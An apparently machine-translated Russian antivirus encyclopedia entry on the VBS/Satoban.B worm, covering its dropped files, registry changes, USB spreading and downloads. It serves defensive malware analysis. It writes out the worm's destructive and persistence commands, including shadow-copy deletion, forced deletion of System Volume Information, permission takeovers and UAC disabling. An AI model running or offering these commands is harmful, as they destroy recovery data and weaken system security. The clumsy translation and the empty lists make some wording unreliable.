| Автор |
 |
| Категория |
Червь |
| Дата обнаружения |
24.03.2014 |
| Размер |
71693 |
| Другие названия |
|
|
Win32:Agent-AQTU (Avast) |
Краткое описание
VBS/Satoban.В это червь, который распространяется через общие папки и съемные носители информации. Червь пытается загрузить и выполнить несколько файлов из Интернета.
Как устанавливается
При запуске червь создает следующие папки:
- %systemdrive%\Kernel
- %systemdrive%\Kernel\lpt1
- %systemdrive%\security
- %systemdrive%\security\lpt1
- %systemroot%\system32\system
- %systemroot%\system32\system\msg
Червь копирует себя в следующие населенные пункты:
- %systemdrive%\Kernel\r00t3er
- %systemdrive%\security\blood.dat
%Systemdrive%\ядра, %systemdrive%\security папка может иметь система (Ы) и скрытый (H) набор атрибутов в попытке скрыть папку в Windows Explorer.
%Systemdrive%\Kernel\r00t3er файл(ы) может иметь система (Ы) и скрытый (H) атрибуты, присутствующие в попытке скрыть файл в Windows Explorer.
Червь создает следующие файлы:
- %allusersprofile%\rescue.vbe (1890 B, VBS/TrojanDownloader.Psyme.NJJ)
- %systemroot%\system32\system\svchost.exe (12 B)
- %systemroot%\system32\system\msg\config.txt (426 B)
- %temp%\tmp.vbe (2178 B, VBS/Satoban.A)
- %temp%\b.bat (2086 B, VBS/Satoban.A)
- %systemdrive%\security\system.vbs (123 B, VBS/Satoban.A)
Червь может создавать копии следующих файлов (source, destination):
- %systemroot%\system32\wscript.exe, %systemdrive%\security\svchost.exe
Червь выполняет следующие команды:
- sc create system binPath= "%systemroot%\System32\system\svchost.exe msg" start= auto &
- net start system &
- sc description system " processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque d'etre endommagé. " &
- EXIT
Для автоматического запуска с системой, червь создает следующие записи в реестре:
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "rescue" = "%allusersprofile%\rescue.vbe"
- "rescue" = "%allusersprofile%\rescue.vbe"
Создаются следующие записи в реестре:
- [HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
- [HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System]
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
- "DisableRegistryTools" = 0
- "DisableTaskMgr" = 0
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate]
- [HKEY_CLASSES_ROOT\Applications\Notepad2.exe\Shell\Open]
- "command" = "%systemroot%\System32\Notepad.exe"
- [HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open]
- "command" = "%systemroot%\System32\Notepad.exe"
- [HKEY_CLASSES_ROOT\Batfile\Shell\Edit\Command]
- "" = "%systemroot%\System32\Notepad.exe"
- [HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command]
- "" = "%systemroot%\System32\Notepad.exe"
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
- "Hidden" = 2
- "ShowSuperHidden" = 0
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\System]
- "Type" = 16
- "Start" = 2
- "ErrorControl" = 1
- "ImagePath" = "%systemroot%\System32\system\svchost.exe msg"
- "ObjectName" = "LocalSystem"
- "Description" = " processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque d'etre endommagé. "
- "Timeout" = 0
- "DisableCMD" = 0
- "DisableRegistryTools" = 0
- "DisableTaskMgr" = 0
- "sdate" = "38"
- "command" = "%systemroot%\System32\Notepad.exe"
- "command" = "%systemroot%\System32\Notepad.exe"
- "" = "%systemroot%\System32\Notepad.exe"
- "" = "%systemroot%\System32\Notepad.exe"
- "Hidden" = 2
- "ShowSuperHidden" = 0
- "Type" = 16
- "Start" = 2
- "ErrorControl" = 1
- "ImagePath" = "%systemroot%\System32\system\svchost.exe msg"
- "ObjectName" = "LocalSystem"
- "Description" = " processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque d'etre endommagé. "
Червь может удалить файлы хранятся в следующих папках:
- %systemdrive%\Kernel
- %systemdrive%\security
Распространение
Червь ищет доступные локальные и съемные диски. Червь может удалить следующие файлы:
- %drive%\*.vbe
- %drive%\*.lnk
- %drive%\config.dat
- %drive%\autorun.inf
- %drive%\microsoft.dat
Червь ищет следующие папки:
Червь создает следующий файл:
Имя нового файла на основе имени папки, нашел в поиске.
Файл-это ярлык на вредоносный файл.
Червь копирует себя в следующие местоположения:
%Диск%\config.dat-файл(ы) может иметь система (Ы) и скрытый (H) атрибуты, присутствующие в попытке скрыть файл в Windows Explorer.
Дополнительная информация
Червь может задать следующие записи реестра:
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
- "ConsentPromptBehaviorAdmin" = 0
- "EnableLua" = 0
- [HKEY_CURRENT_USER\VBEFile\DefaultIcon]
- "" = "%systemroot%\system32\shell32.dll,1"
- "ConsentPromptBehaviorAdmin" = 0
- "EnableLua" = 0
- "" = "%systemroot%\system32\shell32.dll,1"
Червь может удалить следующие записи реестра:
- [HKEY_CLASSES_ROOT\lnkfile]
- "IsShortCut"
Червь создает следующие файлы:
- %temp%\uac.bat (1904 B, VBS/Agent.NCF)
- %temp%\ADMIN.vbe (292 B, VBS/AutoRun.HX)
- %temp%\CPBA.bat (390 B, VBS/Satoban.A)
- %temp%\tp.vbe (175 B, VBS/AutoRun.HX)
- %temp%\tmp.bat (1108 B, VBS/Agent.NCF)
Червь, возможно, попытка загрузки файлов из Интернета. Червь содержит список из 7 адресов. Используется HTTP протокол.
Они сохраняются в следующие папки:
- %systemdrive%\security\system.txt
- %temp%\booter.dat
- %systemdrive%\kernel\explorer.jpg
- %systemdrive%\kernel\update.txt
Червь движется следующие файлы (source, destination):
- %systemdrive%\security\system.txt, %systemdrive%\security\system.vbe
- %temp%\booter.dat, %temp%\reskp.exe
- %systemdrive%\security\system.txt, %systemdrive%\security\system.bat
- %systemdrive%\security\system.txt, %systemdrive%\security\system.exe
- %systemdrive%\kernel\explorer.jpg, %systemdrive%\kernel\explorer.exe
- %systemdrive%\kernel\update.txt, %systemdrive%\kernel\Update.exe
- %systemroot%\system32\drivers\flpydisk.sys, %systemroot%\system32\drivers\flpydisk.sy_
Червь создает свои копии следующих файлов (source, destination):
- %systemdrive%\kernel\*.vbe, %temp%
- %scriptpath%, %temp%
Удаляются следующие файлы:
- %systemdrive%\*.lnk
- %systemdrive%\autorun.inf
- %temp%\%scriptfile%
Червь может выполнить следующие команды:
- cmd /K takeown /F %systemdrive%\kernel /A /R /D O &
- CACLS %systemdrive%\Kernel /E /T /C /G %username%:F &
- takeown /F %systemdrive%\security /A /R /D O &
- CACLS %systemdrive%\security /E /T /C /G %username%:F &
- takeown /F "%allusersprofile%\" /A /R /D O &
- takeown /a /f %systemroot%\System32\wscript.exe &
- ICACLS %systemroot%\System32\wscript.exe /Grant %username%:F &
- takeown /F "%systemroot%\system32\drivers" /A /R /D O &
- takeown /a /f %systemroot%\System32\drivers\flpydisk.sys &
- ICACLS %systemroot%\System32\drivers\flpydisk.sys /Grant %username%:F &
- takeown /F "%systemdrive%\system Volume Information" /A /R /D O &
- CACLS "%systemdrive%\system Volume Information" /E /T /C /G %username%:F &
- EXIT
- sc config TermService start= auto > nul
- svchost.exe /e:VBScript.Encode %systemdrive%\security\blood.dat
- cmd /K vssadmin delete shadows /all /quiet & cd/d "%systemdrive%\system volume Information" &
- del/f/s/q/a "%systemdrive%\system volume Information\*.*" &
- EXIT
- cmd /K md %systemroot%\system32\system &
- md %systemroot%\system32\system\msg &
- EXIT
- cmd /u /K ( @echo DisplayName=msg&@echo Description=Description&
- @echo ServiceType=272&
- echo WaitActive=0&
- @echo StartType=2&
- @echo ErrorControl=1&
- @echo Source=%systemdrive%\security\system.vbs&
- @echo ResetPeriod=0&
- @echo RebootMsg=&
- @echo Command=&
- @echo nActions=0&
- @ echo Actions=&
- @echo StartAtTime=OneTime) > %systemroot%\system32\system\msg\config.txt &
- EXIT
- cmd /K cd/d %systemroot%\system32\drivers &
- ren flpydisk.sys flpydisk.sy_ &
- del/f/q/s %systemdrive%\security\system.bat &
- del/f/q/s %systemdrive%\security\system.exe &
- del/f/q/s %systemdrive%\kernel\explorer.exe &
- del/f/q/s %systemdrive%\kernel\update.exe &
- del/f/q/s ""%temp%\reskp.exe"" &
- rd/q/s %systemdrive%\system32 &
- rd/q/s %systemdrive%\system &
- EXIT
- cmd /K del/f/q/A "%systemdrive%\security\*.dat" &
- xcopy /C /H /Y /R "%drive%\config.dat" "%systemdrive%\security" &
- attrib -s -h "%systemdrive%\security\*.*" &
- ren "%systemdrive%\security\*.*" blood.dat &
- EXIT
- cmd /K del/f/q/A "%systemdrive%\kernel\*.dat" &
- xcopy /C /H /Y /R "%drive%\config.dat" "%systemdrive%\kernel" &
- attrib -s -h "%systemdrive%\kernel\*.*" &
- ren "%systemdrive%\kernel\*.*" r00t3r &
- attrib +s +h "%systemdrive%\kernel\*.*" &
- EXIT
- cmd /K cd/d "%systemdrive%\security" &
- copy /b /y blood.dat + &
- EXIT
Червь удаляет точки восстановления системы.
Он содержит следующие строки:
- '========================================================================================='
- '
- ' C0d3 N4me : S4T4n
- ' Cr34t0r : R4PTOR
- ' Created for personal use , modifications or others are not authorized
- ' For more informations, looking 4 me { - CNG4L on Race }
- '
- '========================================================================================='
